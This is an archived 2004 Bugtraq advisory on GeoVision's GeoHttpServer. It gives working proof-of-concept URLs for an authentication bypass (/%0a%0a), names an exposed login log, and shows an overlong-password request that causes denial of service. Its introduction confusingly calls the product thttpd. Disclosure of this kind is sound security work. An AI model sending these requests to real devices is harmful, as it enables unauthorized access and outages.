lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 22 Jan 2004 19:23:16 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Cc: "securitytracker" <bugs@...uritytracker.com>
Subject: GeoHttpServer Authentification Bypass Vulnerability & D.O.S (Denial Of Service)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software:       GeoHttpServer
Vendor:          GEOVISION INC
                        http://www.geovision.com.tw
Versions:        ALL
Platforms:       Unix
Bug:                 Authentification Bypass Vulnerability & D.O.S (Denial
Of Service)
Risk:                High
Exploitation:   Remote with browser
Date:               22 Jan 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@...l.com
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" webserver that comes by default with unix
systems such as
FREEBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer Security is pretty good. Some users, who understand what
they are doing configure the server to authentificate login attempts.

The server uses this authentification code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
  <input type="id" name="id" size="10"><p></p>
  Password:</BR>
  <input type="password" name="pwd" size="10">
  <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
  <input type="radio" name="ImageType" value="2">GIF</p>
  <p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center><br>
  </p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly - http://<host>/%0a%0a Bypasses it!
You get the GeoHttpServer default Main Page.

Now the main page leads to functions that also require authentifiaction,
In order to retrieve a user name we can go to http://<host>/logfile.txt
Which generally contains the last logins and usernames.
In most cases the password will be the same as the user.

In addition there is an authentification form inside the server that
requires a name and
a password in order to see the server info/config.
Manipulating this links can cause Denial Of service of the server.

P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

Another D.O.S caused by the server is an Internet Explorer D.O.S when
someone is watching
video stream from the server and presses the reconnect button, I.E has an
overflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authentification Bypass - http://<host>/%0a%0a Bypasses it!
Denial Of Service -
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ